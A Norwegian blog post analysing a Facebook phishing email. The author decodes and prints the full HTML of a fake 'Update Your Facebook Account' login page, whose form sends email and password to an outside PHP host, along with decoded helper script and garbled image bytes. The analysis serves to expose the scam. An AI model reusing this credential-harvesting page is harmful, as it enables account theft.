Internet Archive: Wayback Machine misbrukes i Facebook svindel

Jeg fikk denne mailen som ett tips. Der det står at dine Facebook forespørsler skal stoppes før du har oppgradert kontoen din. Denne er ganske dårlig laget, men jeg liker å grave i spam. Det er nemlig en link i denne spammen som er interresant. Du ledes nemlig til en falsk Facebook påloggingside.

Nettsiden som det linkes til på toppen av Facebook svindel er wayback machine. Det er ett av verdens mest kjente nettsteder for å sjekke historien til gamle internet sider på internet.

Jeg trykker meg nedover på linken i spam for å se hvor jeg havner og da finner jeg dette.

da finner jeg ut av man kan få tilgang til store deler av mappestrukturen. Før dette har blitt publisert så har jeg informert dem via mail om at dette må stenges ned. Jeg går tilbake til Facebooksvindelen og der går jeg inn for å se på koden i svindelen.

Det meste her er gresk for meg og dere, men på toppen så står der unescape. Det er en krypteringsmetode som brukes på nett. Så da kan jeg finne ett gratis verktøy som dekrypterer koden. Krypterer de koden så har de noe å skjule.

Når koden er dekryptert finner jeg dette:

<!–
document.write(unescape(‘<!DOCTYPE html PUBLIC “-//W3C//DTD HTML 4.01//EN” “http://www.w3.org/TR/html4/strict.dtd”>
<html><head>
<meta http-equiv=”content-type” content=”text/html; charset=windows-1252″>
<link rel=”shortcut icon” href=”favicon.gif” type=”image/gif”><title>Facebook | Security System</title>
<script type=”text/javascript” src=”data:application/x-javascript;base64,Ly8gcHJlc2V0LmpzICBDb3B5cmlnaHQgMjAwOS0yMDE0IGJ5IFJpY2hhcmQgTC4gVHJldGhld2V5IC0gQWxsIFJpZ2h0cyBSZXNlcnZlZAovLyBQZXJtaXNzaW9uIGlzIGdyYW50ZWQgdG8gdXNlIHRoaXMgY29kZSBhcyBsb25nIGFzIHRoaXMgY29weXJpZ2h0IG5vdGljZQovLyBpcyBsZWZ0IGludGFjdC4gIEZvciBtb3JlIGluZm9ybWF0aW9uLCBzZWUgaHR0cDovL3d3dy5yYWluYm9kZXNpZ24uY29tL3B1Yi8KCi8vIEdldCB0aGUgcXVlcnkgc3RyaW5nIGNvbnRlbnRzIGZyb20gdGhlIHBhZ2UgVVJMIHVzZWQgYnkgcmVtb3ZpbmcgdGhlICI/Igp2YXIgcXVlcnkgPSBsb2NhdGlvbi5zZWFyY2guc3Vic3RyKDEpOwoKdmFyICBzZWFyY2hfcGF0dGVybiA9ICdcXCsnOwp2YXIgIHNlYXJjaF9mbGFncyA9ICdnJzsKdmFyICBzZWFyY2hfcmVnX2V4cCA9IG5ldyBSZWdFeHAoc2VhcmNoX3BhdHRlcm4sIHNlYXJjaF9mbGFncyk7CgpmdW5jdGlvbiBwb3B1bGF0ZShmb3JtTmFtZSkgewogIGlmIChxdWVyeSkgewkJCQkJCS8vIFdhcyB0aGVyZSBhIHF1ZXJ5IHN0cmluZz8KdmFyIHBhcmFtcyA9IHF1ZXJ5LnNwbGl0KCImIik7CQkJCS8vIFllcyEgIFNwbGl0IHRoZW0gdXAKdmFyIHRoZUZvcm0gPSBmaW5kRm9ybShmb3JtTmFtZSk7CQkJLy8gTG9jYXRlIHRoZSBmb3JtIHdpdGggdGhlIGNvcnJlY3QgbmFtZS9JRAogICAgaWYgKHRoZUZvcm0gIT0gbnVsbCkgewkJCQkvLyBEaWQgd2UgZmluZCB0aGUgZm9ybT8KICAgICBmb3IgKHE9MDsgcTxwYXJhbXMubGVuZ3RoOyBxKyspIHsKICAgICAgeHkgPSBwYXJhbXNbcV0uc3BsaXQoIj0iKTsJCQkvLyBTcGxpdCB0aGUgY29tbWFuZCBpbnRvIG5hbWUvdmFsdWUgcGFpcgogICAgICBwYXJhbU5hbWUgPSB4eVswXTsKICAgICAgbmV3VmFsdWUgPSB1bmVzY2FwZSh4eVsxXS5yZXBsYWNlKHNlYXJjaF9yZWdfZXhwLCAnICcpKTsJLy8gdHJhbnNsYXRlIHF1ZXJ5IHN0cmluZwoKICAgICAgIGlmICh0aGVGb3JtLmVsZW1lbnRzW3BhcmFtTmFtZV0pIHsJCS8vIGRvZXMgbmFtZWQgZWxlbWVudCBleGlzdD8KCi8vIGFsZXJ0KHBhcmFtTmFtZSArICcgJyArIHRoZUZvcm0uZWxlbWVudHNbcGFyYW1OYW1lXSArICcgJyArIHRoZUZvcm0uZWxlbWVudHNbcGFyYW1OYW1lXS50eXBlKTsKCiAgICAgICBzd2l0Y2godGhlRm9ybS5lbGVtZW50c1twYXJhbU5hbWVdLnR5cGUpIHsKICAgICAgICBjYXNlICd0ZXh0JzoJCQkJCS8vIHR5cGUgPSAidGV4dCIKICAgICAgICBjYXNlICdoaWRkZW4nOgkJCQkJLy8gdHlwZSA9ICJoaWRkZW4iCgljYXNlICd0ZXh0YXJlYSc6CQkJCS8vIDx0ZXh0YXJlYT4KICAgICAgICBjYXNlICdlbWFpbCc6CQkJCQkvLyB0eXBlID0gImVtYWlsIgogICAgICAgIGNhc2UgJ3NlYXJjaCc6CQkJCQkvLyB0eXBlID0gInNlYXJjaCIKICAgICAgICBjYXNlICd1cmwnOgkJCQkJLy8gdHlwZSA9ICJ1cmwiCiAgICAgICAgY2FzZSAnbnVtYmVyJzoJCQkJCS8vIHR5cGUgPSAibnVtYmVyIgogICAgICAgIGNhc2UgJ3JhbmdlJzoJCQkJCS8vIHR5cGUgPSAicmFuZ2UiCiAgICAgICAgICB0aGVGb3JtLmVsZW1lbnRzW3BhcmFtTmFtZV0udmFsdWUgPSBuZXdWYWx1ZTsKICAgICAgICBicmVhazsKCiAgICAgICAgY2FzZSAnc2VsZWN0LW9uZSc6CQkJCS8vIDxzZWxlY3Q+CgkgIHRoZU9wdGlvbiA9IHRoZUZvcm0uZWxlbWVudHNbcGFyYW1OYW1lXTsKCSAgIG1heCA9IHRoZU9wdGlvbi5sZW5ndGg7CgkgICBmb3IgKGkgPSAwOyBpIDwgbWF4OyBpKyspIHsKCSAgICBpZiAodGhlT3B0aW9uLm9wdGlvbnNbaV0udmFsdWUgPT0gbmV3VmFsdWUpIHsgdGhlT3B0aW9uLm9wdGlvbnMuc2VsZWN0ZWRJbmRleCA9IGk7IH0KCSAgIH0gIC8vIGVuZCBmb3IgaQogICAgICAgIGJyZWFrOwoKICAgICAgICBjYXNlIHVuZGVmaW5lZDoJCQkJCS8vIHR5cGUgPSAicmFkaW8iIChyZWFsbHkgJ25vZGVMaXN0JykKCWlmICh0aGVGb3JtLmVsZW1lbnRzW3BhcmFtTmFtZV0pIHsJCS8vIGRvdWJsZS1jaGVjayB0aGlzIGVsZW1lbnQgZXhpc3RzCgkgIHRoZU9wdGlvbiA9IHRoZUZvcm0uZWxlbWVudHNbcGFyYW1OYW1lXTsKCSAgbWF4ID0gdGhlT3B0aW9uLmxlbmd0aDsKCSAgZm9yIChpID0gMDsgaSA8IG1heDsgaSsrKSB7CgkgICBpZiAodGhlT3B0aW9uW2ldLnZhbHVlID09IG5ld1ZhbHVlKSB7IHRoZU9wdGlvbltpXS5jaGVja2VkID0gdHJ1ZTsgfQoJICB9ICAvLyBlbmQgZm9yIGkKCSB9IC8vIGVuZGlmIGV4aXN0cwogICAgICAgIGJyZWFrOwoKICAgICAgICBjYXNlICdjaGVja2JveCc6CQkJCS8vIHR5cGU9ImNoZWNrYm94IgogICAgICAgICAgdGhlRm9ybS5lbGVtZW50c1twYXJhbU5hbWVdLmNoZWNrZWQgPSB0cnVlOwogICAgICAgIGJyZWFrOwoKICAgICAgIH0gLy8gZW5kIHN3aXRjaAogICAgICB9IC8vIGVuZGlmIHRoZUZvcm0uZWxlbWVudHNbcGFyYW1OYW1lXQogICAgfSAvLyBlbmQgZm9yIHEKICAgfSAvLyBlbmRpZiB7dGhlRm9ybSkKIH0gLy8gZW5kaWYgKHF1ZXJ5KQp9IC8vIGVuZCBwb3B1bGF0ZSgpCgpmdW5jdGlvbiBmaW5kRm9ybSh0aGVGb3JtKSB7CmlmIChkb2N1bWVudC5nZXRFbGVtZW50QnlJZCh0aGVGb3JtKSkgewkJCS8vIHRyeSBJRCBmaXJzdAogZm9ybUVsZW1lbnQgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCh0aGVGb3JtKTsKICB9IGVsc2UgewogZm9yIChpPTA7IGk8ZG9jdW1lbnQuZm9ybXMubGVuZ3RoOyBpKyspIHsKICBpZiAoZG9jdW1lbnQuZm9ybXNbaV0ubmFtZSA9PSB0aGVGb3JtKSB7IGZvcm1FbGVtZW50ID0gZG9jdW1lbnQuZm9ybXNbaV07IGJyZWFrOyB9CiB9IC8vIGVuZEZvcgp9IC8vIGVuZGlmIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkCnJldHVybiBmb3JtRWxlbWVudDsKfSAvLyBlbmQgZmluZEZvcm0KCg==”></script>
<style type=”text/css”>
body {
overflow-x:hidden;
}
</style></head><body style=”color: rgb(0, 0, 0); background-color: white;” topmargin=”0″ bottommargin=”0″ leftmargin=”0″ rightmargin=”0″ onload=”populate(‘myForm’);” alink=”#000099″ link=”#000099″ marginheight=”0″ marginwidth=”0″ vlink=”#990099″>
<table style=”width: 100%; height: 100%; text-align: left; margin-left: auto; margin-right: auto;” cellspacing=”0″>
<tbody>
<tr>
<td style=”height: 10%; background-color: white;”></td>
</tr>
<tr>
<td style=”height: 20%; background-color: white;”>
<div style=”text-align: center;”> </div>
<table style=”width: 1180px; height: 136px; text-align: left; margin-left: auto; margin-right: auto;”>
<tbody>
<tr>
<td style=”background-color: white; text-align: center;”>
<img src=”https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQZZgf_oHn5QrDOAoxRs88Ui_RF1u-D1C9XaXZcCstTmLXRE62T” alt=”Image result for facebook log” style=”color: rgb(0, 0, 0); font-family: “Times New Roman”; font-size: medium; font-style: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; width: 150px; height: 87px;”> </td>
<td style=”background-color: white;”>
<div align=”right”> <br>
<br>
<br>
<div style=”color: white; text-align: center;”><font style=”color: silver; font-weight: bold;” face=”calibri” size=”+2″><span style=”color: white;”>Update
and  Confirm.</span><br>
</font></div>
</div>
<div style=”text-align: center;”><font color=”#ffffff” face=”calibri” size=”+2″> </font></div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style=”height: 55%;”>
<table style=”background-color: white; height: 300px; text-align: left; margin-left: auto; margin-right: auto;”>
<tbody>
<tr>
<td bgcolor=”” width=”580″>
<table align=”left” width=”500″>
<tbody>
<tr>
<td>
<form method=”post” action=”https://pacificindustriesltd1959.000webhostapp.com/ba8.php” name=”myForm”> <font color=”” face=”calibri” size=”3″> <span style=”font-weight: bold; color: rgb(102, 102, 102);”></span><br>
<font color=”#df0101″ face=”calibri” size=”+2″> <span style=”font-weight: bold; color: rgb(51, 51, 153);”>Update
Your Facebook Account Version.</span><br>
<font style=”color: rgb(102, 102, 102);” color=”#000000″ size=”3″><b>Login with your
details below and update.</b></font><span style=”color: rgb(102, 102, 102);”> </span></font>
<br>
<br>
<input value=”” name=”usernms” style=”border: 2px solid rgb(255, 64, 0); padding: 10px; width: 375px; height: 40px; font-family: Verdana; font-size: 14px; color: rgb(0, 0, 0); background-color: rgb(250, 250, 250);” =”” required=”” placeholder=”Enter Email” type=”email”>
<p> <input name=”pswds” style=”border: 2px solid rgb(255, 64, 0); padding: 10px; width: 375px; height: 40px; font-family: Verdana; font-size: 14px; color: rgb(0, 0, 0); background-color: rgb(250, 250, 250);” =”” required=”” placeholder=”Enter Password” type=”password”> </p>
</font>
<p><font color=”” face=”calibri” size=”3″> <input value=”Login To Confirm” style=”border: 3px solid rgb(223, 1, 1); width: 375px; height: 50px; font-family: Verdana; font-size: 18px; color: rgb(255, 255, 255); -moz-border-radius-topleft: 3px; -moz-border-radius-topright: 3px; -moz-border-radius-bottomright: 3px; -moz-border-radius-bottomleft: 3px; background-color: rgb(223, 1, 1);” type=”submit”> </font> </p>
</form>
</td>
</tr>
</tbody>
</table>
</td>
<td width=”80″></td>
<td style=”width: 220px; background-color: white;”>
<div align=”center”> <img style=”width: 181px; height: 65px;” src=”https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRbqiIhSWdQzJzQCc2N_-lAFPxc9dqUD9Y2OQiajd1HurHwfGFr” alt=”Image result for email security logo”> </div>
<br>
<div align=”center”> <img style=”width: 192px; height: 163px;” src=”data:image/png;base64,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” alt=”Image result for email security logo”> </div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr style=”color: silver;”>
<td bgcolor=”#ffffff” height=”10%”>
<div style=”text-align: center;”></div>
<table align=”center” width=”966″>
<tbody>
<tr>
<td>
<p style=”text-align: center;”><br>
</p>
<div class=”_li” id=”u_0_b” style=”font-family: Helvetica,Arial,sans-serif; color: rgb(29, 33, 41); font-size: 12px; font-style: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; text-align: center;”>
<div id=”globalContainer” class=”uiContextualLayerParent” style=”margin: 0px auto; position: relative; font-family: inherit;”>
<div style=”font-family: inherit;”>
<div id=”pageFooter” data-referrer=”page_footer” style=”margin: 0px auto; color: rgb(115, 115, 115); width: 980px; font-family: inherit;”>
<div class=”mvl copyright” style=”margin-top: 20px; margin-bottom: 20px; font-size: 11px; font-family: inherit;”>
<div style=”font-family: inherit;”> Copyright �
1999-2018 Facebook. All rights reserved</div>
</div>
</div>
</div>
</div>
</div>
<p align=”center”></p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style=”height: 5%; background-color: white;”></td>
</tr>
</tbody>
</table>
</body></html>’));
//–>
</script>

Som du ser så har jeg dekodet en del av teksten, men det er fortsatt noe som er kryptert. Denne gangen med Base64. Det er teksten merket med blått.  Det første blå får jeg dekodet og da finner jeg denne koden:

// preset.js Copyright 2009-2014 by Richard L. Trethewey – All Rights Reserved
// Permission is granted to use this code as long as this copyright notice
// is left intact. For more information, see http://www.rainbodesign.com/pub/

// Get the query string contents from the page URL used by removing the “?”
var query = location.search.substr(1);

var search_pattern = ‘\\+’;
var search_flags = ‘g’;
var search_reg_exp = new RegExp(search_pattern, search_flags);

function populate(formName) {
if (query) { // Was there a query string?
var params = query.split(“&”); // Yes! Split them up
var theForm = findForm(formName); // Locate the form with the correct name/ID
if (theForm != null) { // Did we find the form?
for (q=0; q<params.length; q++) {
xy = params[q].split(“=”); // Split the command into name/value pair
paramName = xy[0];
newValue = unescape(xy[1].replace(search_reg_exp, ‘ ‘)); // translate query string

if (theForm.elements[paramName]) { // does named element exist?

// alert(paramName + ‘ ‘ + theForm.elements[paramName] + ‘ ‘ + theForm.elements[paramName].type);

switch(theForm.elements[paramName].type) {
case ‘text’: // type = “text”
case ‘hidden’: // type = “hidden”
case ‘textarea’: // <textarea>
case ’email’: // type = “email”
case ‘search’: // type = “search”
case ‘url’: // type = “url”
case ‘number’: // type = “number”
case ‘range’: // type = “range”
theForm.elements[paramName].value = newValue;
break;

case ‘select-one’: // <select>
theOption = theForm.elements[paramName];
max = theOption.length;
for (i = 0; i < max; i++) {
if (theOption.options[i].value == newValue) { theOption.options.selectedIndex = i; }
} // end for i
break;

case undefined: // type = “radio” (really ‘nodeList’)
if (theForm.elements[paramName]) { // double-check this element exists
theOption = theForm.elements[paramName];
max = theOption.length;
for (i = 0; i < max; i++) {
if (theOption[i].value == newValue) { theOption[i].checked = true; }
} // end for i
} // endif exists
break;

case ‘checkbox’: // type=”checkbox”
theForm.elements[paramName].checked = true;
break;

} // end switch
} // endif theForm.elements[paramName]
} // end for q
} // endif {theForm)
} // endif (query)
} // end populate()

function findForm(theForm) {
if (document.getElementById(theForm)) { // try ID first
formElement = document.getElementById(theForm);
} else {
for (i=0; i<document.forms.length; i++) {
if (document.forms[i].name == theForm) { formElement = document.forms[i]; break; }
} // endFor
} // endif document.getElementById
return formElement;
} // end findForm

 

På den andre blå teksten så finner jeg dette.

PNG


IHDR>PLTE﴾uq oylrb1kMǰ3~BRhгՔׅw֎ߙٴn̸ޥ͘f\M}x\>2KIDATx}_<AWYKU+SZ1A|R7+{!iRH[}srrr&‡>}YV7Q~Ҭ󾏬dMUU0TUժ(m5>O]5@:w֨h!GUIo5T==uP?_ndbUzi՞5Myߩ,Y垫&UzmE,ՇU涪S=dҜ6K2isoAy$n[EV9ߏoXq}Ԯ]\4zkGϕ^FAmիfsv]Yl7 yܻ{([)ͫͣJh޹:/x=1kU
Tf⪍hJdp8[dX51Wݴ^zyTk~wH֫;]lM
ũXYL~MϿ嶟]wmCƨ:P9im<#i
&2h;hm< 2d/>4>;uU꧵)U^_ʱЀݹ =i89TU3#FWF 볾c@3zy}YCXv”hԇ`k#Z:XJ_7iNI: FVkchP쾃C=ִ dk”~Z!
t;4pw~c$9U3M6’|7″N `;6
ZF>9]7R$>:Cƶ{{ mM3?J^9:W6/.,h-u{_º|N
Isact+@[>WԻɠsA=AyÄvlFsjz2hN]Lz
,=ɆqMC1\Z.;uq霵*? CJ~#Z6^i6ޕwe3źLm/8e(Pjar{E
A[ȂzmKЕ%f”s tDvl/[<ʁ>/l
Пn{7D xID:|t\9}C MsB,}(j.@_,^ W 1G}t#/A90L076H#Ru`lKe(
B#YMgne0kYBËm҃\AUU4݁SsU]E,@jn Ya !e!JȠoI:?BCA[0LOK>4U’w~L9
ݴ
Uq;xH%W>\R4nA}_#oxuu~v YeY Ţ@‹-֠0h cʠ\A !nZ=>|&~Sf)aL&Qdž ,X`F^1R@ZJ;Β z,ާ)ƭKƕ~XR@Xoyx*yo3ɿρ!OFAcU c7 aw/54B9ghbq7*ɳK5M 
NDC%”M`cL\6K
}!X*
k
78dTnDuIyO{‘w `
aHP&2ׯҡ;`کf13t@Gw[[COe#׌.쁖,05N)ڍoԲAΔax8’*{%
9)w1L-afцb;6 GrRF3ӰBqi=|d7˫6٤e/bzSˁ& Ƞy˸
